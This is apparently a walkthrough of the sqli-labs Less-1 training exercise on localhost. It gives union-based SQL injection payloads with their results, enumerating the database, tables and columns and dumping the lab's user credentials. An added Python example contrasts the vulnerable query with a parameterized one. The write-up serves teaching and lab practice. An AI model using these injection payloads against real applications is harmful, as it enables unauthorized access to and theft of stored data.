http://localhost/sqli-labs/Less-1/
HackBar
MySQL
Apache
First, let's pretend we don't know the back-end code. The SQL query it builds is sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; (the id parameter is concatenated straight into the string).
payload:
http://localhost/sqli-labs/Less-1/?id=1 --+
mysql:
SELECT * FROM users WHERE id='1' LIMIT 0,1
result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' --+
result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
payload:
http://localhost/sqli-labs/Less-1/?id=1' and 1=1 --+
result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+
result:
none!
Conclusion: the site is likely vulnerable to SQL injection. Next, use order by 1-99 to find the number of columns in the queried table.
payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 2 --+
result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+
result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+
result:
Unknown column '4' in 'order clause'
Conclusion: the table has 3 columns.
payload:
http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3--+
result:
Your Login name:Dumb
Your Password:Dumb
This executes successfully, but the union select result is not shown, because the code only outputs the first row of the result set, so the row produced by union select never reaches the page. Setting id=-1 makes the original SELECT match nothing, so the union select row is displayed instead.
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3--+
result:
Your Login name:2
Your Password:3
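Added example (not part of the original writeup): a minimal reproduction in Python of the query shape described at the top of the page, using an in-memory sqlite table as a stand-in for MySQL. It shows why id=-1 surfaces the injected row and how a parameterized query treats the same input as a plain literal. The two user rows are constructed from the page; sqlite's `--` comment does not need the trailing space that MySQL requires, so the `--+` trick is not needed here.

```python
import sqlite3

# Constructed stand-in for the lab's security.users table (two rows taken from the page).
SEED_ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Same shape as the lab: SELECT * FROM users WHERE id='$id' LIMIT 0,1.
    The input is spliced into the SQL text, so a quote, a UNION and a comment
    in it become part of the statement. fetchone() mirrors the page, which
    only displays the first row of the result set."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_parameterized(conn, user_id):
    """Hardened form: the SQL text is fixed and the driver binds the value,
    so the input can only ever be compared as a literal, never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchone()


def demo():
    conn = make_db()
    # The page's id=-1' union select 1,2,3--+ after URL decoding ("+" -> space).
    union_neg = "-1' union select 1,2,3-- "
    return {
        "vuln_id1": lookup_vulnerable(conn, "1"),                # (1, 'Dumb', 'Dumb')
        "vuln_union_neg": lookup_vulnerable(conn, union_neg),    # (1, 2, 3): injected row shown
        "safe_id1": lookup_parameterized(conn, "1"),             # (1, 'Dumb', 'Dumb')
        "safe_union_neg": lookup_parameterized(conn, union_neg), # None: input is just a literal
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:15} {row}")
```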
The page shows 2 and 3, meaning positions 2 and 3 of union select 1,2,3 are echoed back and can hold MySQL expressions. So we try querying the current database name (the database() function) in position 3.
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,database()--+
result:
Your Login name:2
Your Password:security
Database name: security
Next, retrieve the table names.
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 0,1) --+
result:
Your Login name:2
Your Password:emails
You can step through the tables by changing limit 0,1, or use the group_concat function to get all table names at once.
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+
result:
Your Login name:2
Your Password:emails,referers,uagents,users
Taking users as the example, the next step is to get its column names.
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) --+
result:
Your Login name:2
Your Password:id
Again, you can step through with limit 0,1, or use the group_concat function to get all column names at once.
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ) --+
result:
Your Login name:2
Your Password:id,username,password
Finally, dump the usernames and passwords.
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(concat(username,':',password)) from security.users ) --+
result:
Your Login name:2
Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Results:
username  password
Dumb      Dumb
Angelina  I-kill-you
Dummy     p@ssword
secure    crappy
stupid    stupidity
superman  genious
batman    mob!le
admin     admin
admin1    admin1
admin2    admin2
admin3    admin3
dhakkan   dumbo
admin4    admin4